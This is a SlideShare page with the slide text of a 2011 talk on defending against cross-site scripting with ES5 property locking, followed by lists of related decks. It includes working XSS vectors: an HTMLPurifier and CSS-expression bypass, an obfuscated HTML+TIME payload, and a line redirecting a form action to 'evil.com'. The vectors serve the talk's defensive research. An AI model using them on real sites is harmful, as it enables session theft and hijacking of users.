SlideShare una empresa de Scribd logo

Locking the Throneroom 2.0

Mario Heiderich
Mario Heiderich
Tecnología
1 de 47
Descargar para leer sin conexión
Locking the Throne Room How ES5+ will change XSS and Client Side Security A presentation by Mario Heiderich BlueHat, Redmond 2011
Introduction  Mario Heiderich  Researcher and PhD student at the Ruhr-University, Bochum  Security Researcher for SRLabs, Berlin  Security Researcher for Deutsche Post AG, Bonn  Published author and international speaker  HTML5 Security Cheatsheet / H5SC  PHPIDS Project  Twitter @0x6D6172696F
First of all... Buckle Up Take a deep breath A lot of content for a one hour talk We'll be defeating XSS here
Today's menu  JavaScript and the DOM  Cross Site Scripting today  Current mitigation approaches  A peek into the petri dishes of current development  A different approach  ES5 and XSS  Some theory first  And some horrific reality  Future work
JavaScript and XSS  Cross Site Scripting  One site scripting another  Early vectors abusing Iframes  First published attacks in the late nineties  Three four major variations  Reflected XSS  Persistent XSS  DOM based XSS / DOMXSS  Plug-in XSS  Information theft and modification  Impersonation and leverage of more complex attacks
XSS today  An ancient and simple yet unsolved problem  Complexity  Browser bugs  Insecure web applications  Browser plug-ins  Impedance mismatches  Application layer mitigation concepts  New features and spec drafts enabling 0-day attacks  XSS is a user agent problem! Nothing else!
Mitigation History  Server side  Native runtime functions, strip_tags(), htmlentities(), etc.  Runtime libraries and request validation  External libraries filtering input and output  HTMLPurifier, AntiSamy, kses, AntiXSS, SafeHTML  HTTPOnly cookies  Client side protection mechanisms  toStaticHTML() in IE8+ and NoScript  IE8+ XSS filter and Webkit XSS Auditor  Protective extensions such as NoScript, NotScripts  Upcoming approaches such as CSP
Reliability? We broke every single one of them Numerous times And we enjoyed it – as we will in the future
Impedance mismatch  Layer A is unaware of Layer B capabilities and flaws  Layer A deploys the attack  Layer B executes the exploit  Case study:  HTMLPurifier 4.1.1  Server side HTML filter and XSS mitigation library  Internet Explorer 8, CSS expressions and a parser bug  <a style="background:url('/',! @x:expression(write(1))//)!'');"></a>
Ancient Goods  HTML+TIME and behaviors 1;--<?f><l ₩ :!!:x /style=`b&#x5c;65h0061vIor/ĸ :url(#def&#x61ult#time2)ö/';'` ₩ /onbegin= &#x5bµ=u00&#054;1le&#114t&#40&#x31)&#x5d&# x2f/&#xyŧ>  http://html5sec.org/what?
Further vectors  Plug-in based XSS  Adobe Reader  Java applets  Flash player  Quicktime videos  SVG images  Charset injection and content sniffing  UTF-7 XSS, EBCDIC, MacFarsi, XSS via images  Chameleon files, cross context scripting, local XSS  DOMXSS
Quintessence  Server side filtering of client side attacks  Useful and stable for basic XSS protection  Still not remotely sufficient  Affected by charsets, impedance mismatches  Subverted by browser bugs an parser errors  Rendered useless by DOMXSS  Bypassed via plug-in based XSS  Helpless against attacks deployed from different servers  Not suitable for what XSS has become  The server cannot serve protection for the client  And - where will the classic server be in five years?
Revisiting XSS  XSS attacks target the client  XSS attacks are being executed client side  XSS attacks aim for client side data and control  XSS attacks impersonate the user  XSS is a client side problem  Sometimes caused by server side vulnerabilities  Sometimes caused by a wide range of problems transparent for the server  Still we try to improve server side XSS filters
Idea  Prevention against XSS in the DOM  Capability based DOM security  Inspired by HTTPOnly  Cookies cannot be read by scripts anymore  Why not changing document.cookie to do so  JavaScript up to 1.8.5 enabled this  Unfortunately Non-Standard  Example →
__defineGetter__() <script> document.__defineGetter__('cookie', function(){ alert('no cookie access!'); return false; }); </script> … <script> alert(document.cookie) </script>
Problems  Proprietary  And not tamper resistant at all  JavaScript supplies a delete operator  Delete operations on DOM properties reset their state  Getter definitions can simply be overwritten  Object getters - invalid for DOM protection purposes  Same for setters and overwritten methods
Bypass <script> document.__defineGetter__('cookie', function(){ alert('no cookie access!'); return false; }); </script> … <script> delete document.cookie; alert(document.cookie) </script>
Tamper Resistance  First attempts down the prototype chain  document.__proto__.__defineGetter__()  Document.prototype  Attempts to register delete event handlers  Getter and setter definitions for the prototypes  Setter protection for setters  Recursion problems  Interval based workarounds and race conditions  JavaScript 1.8 unsuitable for DOM based XSS protection
ECMA Script 5  Older user agents use JavaScript based on ES3  Firefox 3  Internet Explorer 8  Opera 11  The modern ones already ship ES5 compliance  Google Chrome  Safari 5+  Firefox 4+  Internet Explorer 9 and 10pp3
Object Extensions  Many novelties in ECMA Script 5  Relevance for client side XSS mitigation  Object extensions such as  Object.freeze() and Object.seal()  Object.getOwnPropertyNames() - a lovely method!  Object.defineProperty() / Object.defineProperties()  Object.preventExtensions()  Less relevant but still interesting  Proxy Objects, useless since no host objects allowed...  More meta-programming APIs  Combinations with DOM Level 3 events
({}).defineProperty()  Object.defineProperty() and ..Properties()  Three parameters  Parent object  Child object to define  Descriptor literal  Descriptors allow to manipulate  Get / Set behavior  Value  “Enumerability”  “Writeability”  “Configurability”  Example →
Example <script> Object.defineProperty(document, 'cookie', { get: function(){return:false}, set: function(){return:false}, configurable:false }); </script> … <script> delete document.cookie; alert(document.cookie); </script>
configurable:false  Setting “configurability” to false is final  The object description is stronger than delete  Prototype deletion has to effect  Re-definition is not possible  With this method call cookie access can be forbidden  By the developer  And by the attacker
Prohibition  Regulating access in general  Interesting to prevent cookie theft  Other properties can be blocked too  Method access and calls can be forbidden  Methods can be changed completely  Horizontal log can be added to any call, access and event  That is for existing HTML elements as well  Example →
Action Protection <script> var form = document.getElementById('form'); Object.defineProperty(form, 'action', { set: IDS_detectHijacking, get: IDS_detectStealing, configurable:false }); </script> … <script> document.forms[0].action='//evil.com'; </script>
First Roundup  Access prohibition might be effective  Value and argument logging helps detecting attacks  Possible IDS solutions are not affected by heavy string obfuscation  No impedance mismatches  Attacks are detected on they layer they target  Parser errors do not have effect here  No effective charset obfuscations  Immune against plug-in-deployed scripting attacks  Automatic quasi-normalization  It's a blacklist though
Going Further  No access prohibitions but RBAC via JavaScript  Possible simplified protocol  Let object A know about permitted accessors  Let accessors of object A be checked by the getter/setter  Let object A react depending on access validity  Seal object A  Execute application logic  Strict policy based approach  A shared secret between could strengthen the policy  Example →
RBAC and IDS <script> Object.defineProperty(document, 'cookie', { set:RBAC_checkSetter(IDS_checkArguments()), get:RBAC_checkGetter(IDS_checkArguments()) configurable:false }); // identified via arguments.callee.caller My.allowedMethod(document.cookie); </script> … <script> alert(document.cookie) </script>
Forced Introspection  Existing properties can gain capabilities  The added setter will know:  Who attempts to set  What value is being used  The added getter will know:  Who attempts to get  An overwritten function will know:  How the original function looked like  Who calls the function  What arguments are being used  IDS and RBAC are possible  Tamper resistance thanks to configurable:false
Case Study I  Stanford JavaScript Crypto Library  AES256, SHA256, HMAC and more in JavaScript  „SJCL is secure“  Not true from an XSS perspective  Global variables  Uses  Math.floor(), Math.max(), Math.random()  document.attachEvent(), native string methods etc.  Any of which can be attacker controlled  High impact vulnerabilities ahead...
Case Study II  BeEF – Browser Exploitation Framework  As seen some minutes ago ☺  Uses global variables  window.beef = BeefJS;  Attacker could seal it with Object.defineProperty()  Else the defender could “counterbeef” it  BeEF XSS = Exploiting the exploiter  Maybe a malformed UA string? Or host address?
Deployment  Website owners should obey a new rule  „The order of deployment is everything“  As long as trusted content is being deployed first  Object.defineProperty() can protect  Sealing can be used for good  The script deploying first controls the DOM  Persistent, tamper resistant and transparent  Self-defense is possible  Example →
!defineProperty() <html> <head> <script> … Object.defineProperty(Object, 'defineProperty' { value:[], configurable:false }); </script> … <script> Object.defineProperty(window,'secret', { get:stealInfo }); // TypeError </script>
Reflection  Where are we now with ES5?  Pro:  We can fully restrict property and method access  We have the foundation for a client side IDS and RBAC  We can regulate Object access, extension and modification  CSP and sand-boxed Iframes support this approach  Contra:  It's a blacklist  Magic properties cause problems  We need to prevent creation of a fresh DOM  Right now the DOM sucks!  Still we can approach XSS w/o any obfuscation
But now... Enough with the theory already!
Experimentation  Publish a totally XSS-able website  1st step: Attribute injections  2nd step: Full HTML injections, implemented as crappily as possible  No server filter at all  Protect it with JavaScript only  Block access to document.cookie  Implement a safe getter  Announce a challenge to break it  Break→Score→Await Fix→Break→Score again  Tough challenge→Evolutionary Result-Set→Extra Learning
Code Example document.cookie = '123456-secret-123456'; (function(){ var i,j,x,y; var c = document.cookie; var o = Object.defineProperty; document.cookie=null; o(MouseEvent.prototype, 'isTrusted', {configurable:false}); o(document, 'cookie', {get:function()arguments.callee.caller===Safe.get ? c : null}); x=Object.getOwnPropertyNames(window),x.push('HTMLHeadElement'); for(i in x) { if(/^HTML/.test(x[i])) { for(j in y=['innerHTML', 'textContent', 'text']) { o(window[x[i]].prototype, y[j], {get: function() null}) } } } for(i in x=['wholeText', 'nodeValue', 'data', 'text', 'textContent']) { o(Text.prototype, x[i], {get: function() null}) } })();
A Safe Getter? var Safe = {}; Safe.get = function() { var e = arguments.callee.caller; if(e && e.arguments[0].type === 'click' && e.arguments[0].isTrusted === true) { return document.cookie } return null; }; Object.freeze(Safe);  Make sure it's a click  Make really sure it's a click  Make really sure it's a real click  Look good, right?
Result
Evaluation by Penetration  Turns out it's been all rubbish  Code was broken 52 times  Spoofing “real” clicks  Overwriting frozen properties  Using Iframes and data URIs  Using XHR from within JavaScript and data URIs  Finding leaking DOM properties  Cloning content into textarea and reading the value  Here's a full list  Code was fixed successfully 52 times  Remainder of an overall of zero “unfixable” bypasses?  Well – almost. And depending on the user agent.  IE? Yes sir! Firefox? Yes - kinda. Rest? Nope
Current State  XSSMe¹ still online  http://html5sec.org/xssme  XSSMe² as well  http://xssme.htm5sec.org/  You are welcome to break it  ~14.000 attempts to break it so far  52 succeeded,  52 were ultimately fixed! Thanks plaintext and createHTMLDocument()  XSSMe³ / JSLR is available right now!  http://www.businessinfo.co.uk/labs/jslr/jslr.php  Hat-tips to Gareth Heyes  ~8.000 attempts to break it – of which 15 succeeded (so far) and 14 were fixed  And hopefully there is more to come
How's it done?  XSSMe²  Object.getOwnPropertyNames(window).concat( Object.getOwnPropertyNames(Window.prototype))  document.write('<plaintext id=__doc>')  document.implementation.createHTMLDocument()  JSLR/XSSMe³  All of the above  Apply a random ID to any legitimate element  Check against its existence  Wrap JavaScript code in identifier blocks  High security mode – server supported though  Please, please try to break it!
So?  Client-side, JavaScript only XSS protection is possible  Is it elegant right now? Noope  Does it work on all modern browsers? Almost! IE and FF doing great  Is it feasible? Yes – but fragile  More fragile than protection allotted over n layers? Noope  What remains to be done?  A small wish-list for the browser vendors!  A possibility to make it work elegantly
Future Work I  We need to fix the DOM  Consistency please  Higher prio for DOM bugs – they will be security bugs anyway soon!  Specify a white-list based approach  Fix and refine event handling and DOM properties  DOMFrameContentLoaded  Maybe DOMBeforeSubtreeModified?  Maybe DOMBeforeInsertNode?  The DOM needs more “trustability”  Monitor and contribute to ES6 and ES7  We need DOM Proxies!
Future Work II  Talk to W3C people  DOM Sandboxing kinda works – but that's about it  Introduce the features we need to make it elegant  Specify DOMInit, support its implementation  Specify Object.intercept()  White-list based DOM access and caller interception  Details available soon. Or after a beer or two  And finally?  Please let's fix the Java Plugin! Really!  This is sheer horror and breaks everything  Anyone here from Oracle we could talk to?
Conclusion  XSS remains undefeated - but lots'a steps forwards were made  RIAs gain complexity and power, WDP and Win8  Client-agnostic server side filters designed to fail  Time for a new approach  Still a lot of work to be done  Client-side XSS protection and more is possible  Just not the most elegant  Still – compare 70 lines of JS to 12091 lines of PHP  Let's get it done already  Hard? Yes. No one said it'd be easy :)
Questions  Thanks for your time!  Discussion?  Thanks for advice and contribution:  G. Heyes, S. Di Paola, E. A. Vela Nava  R. Shafigullin, J. Tyson, M. Kinugawa, N. Hippert, M. Nison, K. Kotowicz  D. Ross and M. Caballero  J. Wilander and M. Bergling  J. Magazinius, Phung et al.  All unmentioned contributors

Recomendados

The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
Node js introduction
Node js introductionNode js introduction
Node js introductionJoseph de Castelnau
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsDinesh U
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Angular interview questions
Angular interview questionsAngular interview questions
Angular interview questionsGoa App
 

Recomendados

The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
Node js introduction
Node js introductionNode js introduction
Node js introductionJoseph de Castelnau
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsDinesh U
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Angular interview questions
Angular interview questionsAngular interview questions
Angular interview questionsGoa App
 
Web servers presentacion
Web servers presentacionWeb servers presentacion
Web servers presentacionKiwi Science
 
webpack 101 slides
webpack 101 slideswebpack 101 slides
webpack 101 slidesmattysmith
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
Service workers
Service workersService workers
Service workersjungkees
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Angular Advanced Routing
Angular Advanced RoutingAngular Advanced Routing
Angular Advanced RoutingLaurent Duveau
 
Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Knoldus Inc.
 
Angular overview
Angular overviewAngular overview
Angular overviewThanvilahari
 
Angular introduction students
Angular introduction studentsAngular introduction students
Angular introduction studentsChristian John Felix
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
Use Node.js to create a REST API
Use Node.js to create a REST APIUse Node.js to create a REST API
Use Node.js to create a REST APIFabien Vauchelles
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
XSS
XSSXSS
XSSHrishikesh Mishra
 
Angular - Chapter 4 - Data and Event Handling
Angular - Chapter 4 - Data and Event Handling Angular - Chapter 4 - Data and Event Handling
Angular - Chapter 4 - Data and Event HandlingWebStackAcademy
 
An Introduction of Node Package Manager (NPM)
An Introduction of Node Package Manager (NPM)An Introduction of Node Package Manager (NPM)
An Introduction of Node Package Manager (NPM)iFour Technolab Pvt. Ltd.
 
Introduction Node.js
Introduction Node.jsIntroduction Node.js
Introduction Node.jsErik van Appeldoorn
 
Page object pattern
Page object patternPage object pattern
Page object patternPetro Konopelko
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyAustin Gil
 
Node.Js: Basics Concepts and Introduction
Node.Js: Basics Concepts and Introduction Node.Js: Basics Concepts and Introduction
Node.Js: Basics Concepts and Introduction Kanika Gera
 
NodeJS for Beginner
NodeJS for BeginnerNodeJS for Beginner
NodeJS for BeginnerApaichon Punopas
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 

Más contenido relacionado

La actualidad más candente

Web servers presentacion
Web servers presentacionWeb servers presentacion
Web servers presentacionKiwi Science
 
webpack 101 slides
webpack 101 slideswebpack 101 slides
webpack 101 slidesmattysmith
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
Service workers
Service workersService workers
Service workersjungkees
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Angular Advanced Routing
Angular Advanced RoutingAngular Advanced Routing
Angular Advanced RoutingLaurent Duveau
 
Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Knoldus Inc.
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
Use Node.js to create a REST API
Use Node.js to create a REST APIUse Node.js to create a REST API
Use Node.js to create a REST APIFabien Vauchelles
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Angular - Chapter 4 - Data and Event Handling
Angular - Chapter 4 - Data and Event Handling Angular - Chapter 4 - Data and Event Handling
Angular - Chapter 4 - Data and Event HandlingWebStackAcademy
 
An Introduction of Node Package Manager (NPM)
An Introduction of Node Package Manager (NPM)An Introduction of Node Package Manager (NPM)
An Introduction of Node Package Manager (NPM)iFour Technolab Pvt. Ltd.
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyAustin Gil
 
Node.Js: Basics Concepts and Introduction
Node.Js: Basics Concepts and Introduction Node.Js: Basics Concepts and Introduction
Node.Js: Basics Concepts and Introduction Kanika Gera
 

La actualidad más candente (20)

Web servers presentacion
Web servers presentacionWeb servers presentacion
Web servers presentacion
 
webpack 101 slides
webpack 101 slideswebpack 101 slides
webpack 101 slides
 
Dom based xss
Dom based xssDom based xss
Dom based xss
 
Service workers
Service workersService workers
Service workers
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Angular Advanced Routing
Angular Advanced RoutingAngular Advanced Routing
Angular Advanced Routing
 
Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2
 
Angular overview
Angular overviewAngular overview
Angular overview
 
Angular introduction students
Angular introduction studentsAngular introduction students
Angular introduction students
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
Use Node.js to create a REST API
Use Node.js to create a REST APIUse Node.js to create a REST API
Use Node.js to create a REST API
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
XSS
XSSXSS
XSS
 
Angular - Chapter 4 - Data and Event Handling
Angular - Chapter 4 - Data and Event Handling Angular - Chapter 4 - Data and Event Handling
Angular - Chapter 4 - Data and Event Handling
 
An Introduction of Node Package Manager (NPM)
An Introduction of Node Package Manager (NPM)An Introduction of Node Package Manager (NPM)
An Introduction of Node Package Manager (NPM)
 
Introduction Node.js
Introduction Node.jsIntroduction Node.js
Introduction Node.js
 
Page object pattern
Page object patternPage object pattern
Page object pattern
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
 
Node.Js: Basics Concepts and Introduction
Node.Js: Basics Concepts and Introduction Node.Js: Basics Concepts and Introduction
Node.Js: Basics Concepts and Introduction
 
NodeJS for Beginner
NodeJS for BeginnerNodeJS for Beginner
NodeJS for Beginner
 

Destacado

Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
Jslab rssh: JS as language platform
Jslab rssh: JS as language platformJslab rssh: JS as language platform
Jslab rssh: JS as language platformRuslan Shevchenko
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 

Destacado (7)

Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
 
Jslab rssh: JS as language platform
Jslab rssh: JS as language platformJslab rssh: JS as language platform
Jslab rssh: JS as language platform
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Web Wuermer
Web WuermerWeb Wuermer
Web Wuermer
 

Similar a Locking the Throneroom 2.0

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hoursnoopythesecuritydog
 
AJAX: How to Divert Threats
AJAX: How to Divert ThreatsAJAX: How to Divert Threats
AJAX: How to Divert ThreatsCenzic
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Top Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.NetTop Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.Netalsmola
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730chadtindel
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptDenis Kolegov
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedMinded Security
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 

Similar a Locking the Throneroom 2.0 (20)

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
 
AJAX: How to Divert Threats
AJAX: How to Divert ThreatsAJAX: How to Divert Threats
AJAX: How to Divert Threats
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Unusual Web Bugs
Unusual Web BugsUnusual Web Bugs
Unusual Web Bugs
 
Web Bugs
Web BugsWeb Bugs
Web Bugs
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
 
Top Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.NetTop Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.Net
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 

Más de Mario Heiderich

Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!Mario Heiderich
 

Más de Mario Heiderich (6)

Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
I thought you were my friend - Malicious Markup
